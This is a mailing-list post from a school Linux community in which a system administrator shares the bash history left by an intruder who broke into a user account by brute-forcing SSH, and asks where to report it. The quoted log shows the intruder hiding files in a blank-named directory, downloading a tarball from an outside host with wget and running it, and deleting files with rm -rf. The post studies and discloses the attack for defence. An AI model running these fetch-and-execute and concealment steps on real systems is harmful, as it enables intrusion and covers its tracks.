[K12OSN] OT: Break-In report

[Rob Owens]

I thought you guys might be interested in seeing the tracks of a 
computer break-in.  I won't say whose system it was (to protect the 
embarassed), but the break-in was nothing but a brute-force ssh attempt 
at guessing usernames and passwords.  A regular user account was 
compromised and here is his bash history:

> ls
> cd who
> ls
> exit
> w
> cd /var/tmp
> ls -a
> cd " 
> mkdir " "
> cd " "
> wget quest.dif.jp/x.tgz
> tar zxvf x.tgz
> cd x
> ./start dbdb
> cd ..
> ls -a
> rm -rf *
> passwd
> ls -a
> ps aux
> ps aux | grep dan  (note: the hacked user account was "dan")
> top
> who
> exit

I particularly like the use of " " as a directory name.  Nice and 
invisible.  Also note that the invader put his files in two directories 
which have the "sticky" bit set:  /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch 
of port-scanning.  The OS is going to be re-installed anyway, just to be 
safe.

Are there any organizations out there that this should be reported to? 
(For instance, the way one might send reports to an antivirus group or a 
content filtering group).

-Rob